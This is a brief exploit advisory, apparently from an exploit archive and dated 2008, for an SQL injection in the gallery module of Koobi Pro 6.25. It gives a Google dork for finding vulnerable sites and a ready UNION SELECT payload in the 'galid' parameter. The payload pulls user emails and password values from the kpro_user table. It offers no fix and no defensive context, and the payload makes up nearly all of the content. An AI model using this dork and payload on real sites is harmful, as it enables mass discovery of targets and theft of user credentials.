id: 2854
date: 04/07/2008
title: Koobi Pro 6.25 gallery Remote SQL Injection Vulnerability
author: S@BUN
cves: 

=========================================================
Koobi Pro 6.25 gallery Remote SQL Injection Vulnerability
=========================================================



##########################################
#
# Koobi Pro V6.25 gallery(galid)
#
###########################################
#
# DORK 1 : allinurl: galid "index.php?p=gallerypic"
#
###########################################
EXPLOiT :

index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user

###########################################




#  0day.today [2023-03-24]  #